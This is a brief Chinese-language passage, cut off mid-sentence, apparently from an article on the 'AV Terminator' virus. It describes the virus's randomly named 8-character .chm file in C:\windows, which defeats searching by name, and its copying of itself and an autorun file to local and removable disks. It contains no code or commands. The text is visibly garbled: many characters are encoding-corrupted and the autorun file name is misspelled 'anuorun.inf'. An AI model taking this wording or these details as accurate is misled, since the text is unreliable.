C:＼windows＼隨機(jī)生成病毒名.chm?！癆V終結(jié)者”的病毒名是由大寫字母+數(shù)字隨機(jī)組合而成的，其長度為8位，可以說生成同名病毒的概率是很低的。因此即使我們知道了這是病毒生成的文件，也無法通過病毒名在網(wǎng)絡(luò)上找到病毒的清除方法?！癆V終結(jié)者”病毒運(yùn)行后會在本地磁盤和移動磁盤中復(fù)制病毒文件和anuorun.inf文件，當(dāng)